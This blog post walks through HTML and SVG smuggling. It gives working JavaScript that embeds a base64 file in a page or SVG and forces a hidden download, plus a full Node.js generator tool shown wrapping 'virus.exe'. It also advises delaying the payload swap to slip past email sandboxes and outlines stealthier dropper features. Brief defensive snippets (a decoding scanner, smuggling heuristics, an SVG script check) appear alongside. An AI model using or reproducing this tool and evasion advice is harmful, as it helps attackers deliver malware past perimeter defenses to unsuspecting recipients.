



Disclaimer:

The information provided on this blog is for educational purposes only. The use of hacking tools discussed here is at your own risk.

For the full disclaimer, please click here.

Introduction

Welcome to the world of cybersecurity, where adversaries are always one step ahead, cooking up new ways to slip past our defenses. One technique that’s been causing quite a stir among hackers is HTML and SVG smuggling. It’s like hiding a wolf in sheep’s clothing—using innocent-looking files to sneak in malicious payloads without raising any alarms.

Understanding the Technique

HTML and SVG smuggling is all about exploiting the blind trust we place in web content. We see HTML and SVG files as harmless buddies, used for building web pages and creating graphics. But little do we know, cybercriminals are using them as Trojan horses, hiding their nasty surprises inside these seemingly friendly files.

How It Works

So, how does this digital sleight of hand work? Well, it’s all about embedding malicious scripts or payloads into HTML or SVG files. Once these files are dressed up and ready to go, they’re hosted on legitimate websites or sent through seemingly harmless channels like email attachments. And just like that, attackers slip past our defenses, like ninjas in the night.

Evading Perimeter Protections

Forget about traditional attack methods that rely on obvious malware signatures or executable files. HTML and SVG smuggling flies under the radar of many perimeter defenses. By camouflaging their malicious payloads within innocent-looking web content, attackers can stroll right past firewalls, intrusion detection systems (IDS), and other security guards without breaking a sweat.
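To make that a bit more concrete, here is a minimal Node.js sketch of why a scanner that only looks for raw byte signatures in a response body misses a base64-wrapped file, and why decoding before scanning helps. Everything in it is made up for illustration: the harmless marker string, the function names naiveScan and decodingScan, and the 16-character threshold are my assumptions, not how any particular product works.

```javascript
// Hypothetical, harmless "signature" that stands in for a real malware signature.
const SIGNATURE = "HARMLESS-TEST-MARKER";

// Naive perimeter check: look for the raw signature in the response body.
function naiveScan(body) {
  return body.includes(SIGNATURE);
}

// Slightly smarter check: also decode long base64-looking runs and scan the result.
function decodingScan(body) {
  if (naiveScan(body)) return true;
  // Assumed threshold: only consider runs of 16 or more base64 characters.
  const candidates = body.match(/[A-Za-z0-9+/]{16,}={0,2}/g) || [];
  return candidates.some((chunk) =>
    Buffer.from(chunk, "base64").toString("latin1").includes(SIGNATURE)
  );
}

// Build a page that carries the marked content only in base64 form.
const payload = `some file content with ${SIGNATURE} inside`;
const encoded = Buffer.from(payload).toString("base64");
const page = `<html><body><script>var file="${encoded}";</script></body></html>`;

console.log(naiveScan(page));    // false: the raw signature never appears in the page
console.log(decodingScan(page)); // true: it shows up once the base64 run is decoded
```

Treat this as a toy. The regex only catches runs that are unbroken and correctly aligned, so splitting or re-encoding the string would defeat it, which is exactly why defenders tend to pair content inspection with behavioral checks.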

Implications for Security

The implications of HTML and SVG smuggling are serious business. It’s a wake-up call for organizations to beef up their security game with a multi-layered approach. But it’s not just about installing fancy software—it’s also about educating users and keeping them on their toes. With hackers getting sneakier by the day, we need to stay one step ahead to keep our digital fortresses secure.

The Battle Continues

In the ever-evolving world of cybersecurity, HTML and SVG smuggling are the new kids on the block, posing a serious challenge for defenders. But fear not, fellow warriors! By staying informed, adapting our defenses, and collaborating with our peers, we can turn the tide against these digital infiltrators. So let’s roll up our sleeves and get ready to face whatever challenges come our way.

Enough theory and talk, let's get our hands dirty! 🏴‍☠️

Being malicious

At this point I would like to remind you of my Disclaimer, again 😁.

I prepared a demo using a simple Cloudflare Pages website. The payload being downloaded is an EICAR test file.

Here is the page: HTML Smuggling Demo <- Clicking this will download an EICAR test file onto your computer. If you read the Wikipedia article above, you will understand that this could (and should) trigger your antivirus.

Here is the code (I cut part of the payload out, or it would get too big):

    <body>
      <script>
        // Decode a base64 string into an ArrayBuffer of raw bytes.
        function base64ToArrayBuffer(base64) {
          var binary_string = window.atob(base64);
          var len = binary_string.length;
          var bytes = new Uint8Array(len);
          for (var i = 0; i < len; i++) {
            bytes[i] = binary_string.charCodeAt(i);
          }
          return bytes.buffer;
        }

        var file = "BASE64_ENCODED_PAYLOAD";
        var data = base64ToArrayBuffer(file);
        var blob = new Blob([data], { type: "octet/stream" });
        var fileName = "eicar.com";

        if (window.navigator.msSaveOrOpenBlob) {
          // Legacy Internet Explorer / old Edge path.
          window.navigator.msSaveOrOpenBlob(blob, fileName);
        } else {
          // Create a hidden link to the blob and click it programmatically.
          var a = document.createElement("a");
          console.log(a);
          document.body.appendChild(a);
          a.style = "display: none";
          var url = window.URL.createObjectURL(blob);
          a.href = url;
          a.download = fileName;
          a.click();
          window.URL.revokeObjectURL(url);
        }
      </script>
    </body>

This will create an auto-clicked link on the page, which looks like this:

    <a href="blob:https://2cdcc148.fck-vp.pages.dev/dbadccf2-acf1-41be-b9b7-7db8e7e6b880" download="eicar.com" style="display: none;"></a>

This is HTML smuggling at its most basic. Just take any file, encode it in base64, and insert the result into var file = "BASE64_ENCODED_PAYLOAD";. Easy peasy, right? But beware, savvy sandbox-based systems can sniff out these tricks. To outsmart them, try a little sleight of hand. Instead of attaching the encoded HTML directly to an email, start with a harmless-looking link. Then, after a delay, slip in the “payloaded” HTML. It’s like sneaking past security with a disguise. The delay means the initial scan only ever sees a clean, innocent page.

By playing it smart, you up your chances of slipping past detection and hitting your target undetected. But hey, keep in mind, not every tactic works every time. Staying sharp and keeping up with security measures is key to staying one step ahead of potential threats.
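Flipping to the defender's chair for a second: the basic page above leaves some pretty obvious fingerprints, namely a huge base64 string sitting next to atob, Blob, createObjectURL and a download attribute. Here is a rough Node.js sketch of a heuristic that counts those fingerprints. The function names, the 200-character threshold and the "four out of five" cut-off are all my own assumptions for illustration, and benign pages can legitimately trip some of these checks.

```javascript
// Hypothetical threshold: base64-looking runs at least this long count as suspicious.
const MIN_BASE64_RUN = 200;

// Collect simple static indicators from an HTML (or SVG) document given as a string.
function findSmugglingIndicators(html) {
  const runs = html.match(/[A-Za-z0-9+/]{20,}={0,2}/g) || [];
  const longest = runs.reduce((max, run) => Math.max(max, run.length), 0);
  return {
    longBase64: longest >= MIN_BASE64_RUN,
    decodesBase64: /\batob\s*\(/.test(html),
    buildsBlob: /new\s+Blob\s*\(/.test(html),
    createsObjectUrl: /createObjectURL\s*\(/.test(html),
    forcesDownload: /\.download\s*=|msSaveOrOpenBlob/.test(html),
  };
}

// Hypothetical cut-off: flag the page when at least four indicators are present.
function looksLikeSmuggling(html) {
  const hits = Object.values(findSmugglingIndicators(html)).filter(Boolean).length;
  return hits >= 4;
}

// A stand-in page with a harmless 400-character base64 string ("ABC" repeated).
const suspicious =
  `<script>var file="${"QUJD".repeat(100)}";var b=atob(file);` +
  `var blob=new Blob([b]);var a=document.createElement("a");` +
  `a.href=URL.createObjectURL(blob);a.download="x.bin";a.click();</script>`;
const benign =
  `<html><body><p>Hello</p><script>console.log("hi")</script></body></html>`;

console.log(looksLikeSmuggling(suspicious)); // true
console.log(looksLikeSmuggling(benign));     // false
```

Static string matching like this is easy to sidestep, so it is best seen as a first-pass triage signal and not a verdict.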

Advanced Smuggling

If you’re an analyst reading this, you’re probably yawning at the simplicity of my example. I mean, come on, spotting that massive base64 string in the HTML is child’s play for you, right? But fear not, there are some nifty tweaks to spice up this technique. For instance, ever thought of injecting your code into an SVG?

    <svg
      xmlns="http://www.w3.org/2000/svg"
      xmlns:xlink="http://www.w3.org/1999/xlink"
      version="1.0"
      width="100"
      height="100"
    >
      <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
      <script>
        <![CDATA[document.addEventListener("DOMContentLoaded",function(){function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='BASE64_PAYLOAD_HERE';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='karl.webp';var a=document.createElementNS('http://www.w3.org/1999/xhtml','a');document.documentElement.appendChild(a);a.setAttribute('style','display:none');var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);});]]>
      </script>
    </svg>

You can stash the SVG in a CDN and have it loaded at the beginning of your page. It’s a tad more sophisticated, right? Just a tad.
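The flip side is that an SVG which is really just a picture has no business carrying script. As a rough illustration, here is a Node.js sketch that flags "active" content in an SVG string. The function names and the list of checks are my own assumptions, and regexes are no substitute for a proper XML parser or sanitizer, so take it as a starting point only.

```javascript
// Report which kinds of active content appear in an SVG document given as a string.
function svgActiveContent(svgText) {
  return {
    // Inline or external script elements.
    scriptElement: /<script[\s>]/i.test(svgText),
    // Inline event handlers such as onload= or onclick=.
    eventHandler: /\son[a-z]+\s*=/i.test(svgText),
    // Links that run script when followed.
    javascriptUrl: /(?:href|xlink:href)\s*=\s*["']\s*javascript:/i.test(svgText),
    // foreignObject can embed arbitrary (X)HTML inside the SVG.
    foreignObject: /<foreignObject[\s>]/i.test(svgText),
  };
}

// An SVG is treated as passive only if none of the checks fire.
function isPassiveSvg(svgText) {
  return !Object.values(svgActiveContent(svgText)).some(Boolean);
}

const plainSvg =
  `<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">` +
  `<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" /></svg>`;
const scriptedSvg =
  `<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">` +
  `<circle cx="50" cy="50" r="40" fill="red" />` +
  `<script><![CDATA[console.log(1);]]></script></svg>`;

console.log(isPassiveSvg(plainSvg));    // true
console.log(isPassiveSvg(scriptedSvg)); // false
```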

Now, I can’t take credit for this genius idea. Nope, the props go to Surajpkhetani, whose AutoSmuggle tool also gave me the idea for this post. I decided to put my own spin on it and rewrote the tool in JavaScript. Why? Well, just because I can. I mean, I could have gone with Python or Go… and who knows, maybe I will someday. But for now, here’s the JavaScript code:

    const fs = require("fs");

    // Base64-encode the input (a Buffer or a string).
    function base64Encode(plainText) {
      return Buffer.from(plainText).toString("base64");
    }

    // Wrap the encoded data in an SVG file and write it to the current directory.
    function svgSmuggle(b64String, filename) {
      const obfuscatedB64 = b64String;
      const svgBody = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" width="100" height="100"><circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/><script><![CDATA[document.addEventListener("DOMContentLoaded",function(){function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='${obfuscatedB64}';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='${filename}';var a=document.createElementNS('http://www.w3.org/1999/xhtml','a');document.documentElement.appendChild(a);a.setAttribute('style','display:none');var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);});]]></script></svg>`;
      const [file2, file3] = filename.split(".");
      fs.writeFileSync(`smuggle-${file2}.svg`, svgBody);
    }

    // Wrap the encoded data in an HTML file and write it to the current directory.
    function htmlSmuggle(b64String, filename) {
      const obfuscatedB64 = b64String;
      const htmlBody = `<html><body><script>function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='${obfuscatedB64}';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='${filename}';if(window.navigator.msSaveOrOpenBlob){window.navigator.msSaveOrOpenBlob(blob,fileName);}else{var a=document.createElement('a');console.log(a);document.body.appendChild(a);a.style='display:none';var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);}</script></body></html>`;
      const [file2, file3] = filename.split(".");
      fs.writeFileSync(`smuggle-${file2}.html`, htmlBody);
    }

    // Print an error message in red.
    function printError(error) {
      console.error("\x1b[31m%s\x1b[0m", error);
    }

    function main(args) {
      try {
        let inputFile, outputType;

        // Parse the -i (input file) and -o (output type) arguments.
        for (let i = 0; i < args.length; i++) {
          if (args[i] === "-i" && args[i + 1]) {
            inputFile = args[i + 1];
            i++;
          } else if (args[i] === "-o" && args[i + 1]) {
            outputType = args[i + 1];
            i++;
          }
        }

        if (!inputFile || !outputType) {
          printError(
            "[-] Invalid arguments. Usage: node script.js -i inputFilePath -o outputType(svg/html)"
          );
          return;
        }

        console.log("[+] Reading Data");
        const streamData = fs.readFileSync(inputFile);
        const b64Data = base64Encode(streamData);
        console.log("[+] Converting to Base64");
        console.log("[*] Smuggling in", outputType.toUpperCase());

        if (outputType === "html") {
          htmlSmuggle(b64Data, inputFile);
          console.log("[+] File Written to Current Directory...");
        } else if (outputType === "svg") {
          svgSmuggle(b64Data, inputFile);
          console.log("[+] File Written to Current Directory...");
        } else {
          printError(
            "[-] Invalid output type. Only 'svg' and 'html' are supported."
          );
        }
      } catch (ex) {
        printError(ex.message);
      }
    }

    main(process.argv.slice(2));

Essentially, it generates HTML pages or SVG “images” for you, simply by running:



    node autosmuggler.cjs -i virus.exe -o html

I’ve dubbed it HTMLSmuggler. Swing by my GitHub to grab the code and take a peek. But hold onto your hats, because I’ve got big plans for this little tool.

In the pipeline, I’m thinking of ramping up the stealth factor. Picture this: slicing and dicing large files into bite-sized chunks like JSON, then sneakily loading them in once the page is up and running. Oh, and let’s not forget about auto-deleting payloads and throwing in some IndexedDB wizardry to really throw off those nosy analysts.

I’ve got this wild notion of scattering the payload far and wide—some bits in HTML, others in JS, a few stashed away in local storage, maybe even tossing a few crumbs into a remote CDN or even the URL itself.

The goal? To make this baby as slippery as an eel and as light as a feather. Because let’s face it, if you’re deploying a dropper, you want it to fly under the radar—not lumber around like a clumsy elephant.

The End

Whether you’re a newbie to HTML smuggling or a seasoned pro, I hope this journey has shed some light on this sneaky technique and sparked a few ideas along the way.

Thanks for tagging along on this adventure through my musings and creations. Until next time, keep those creative juices flowing and stay curious! 🫡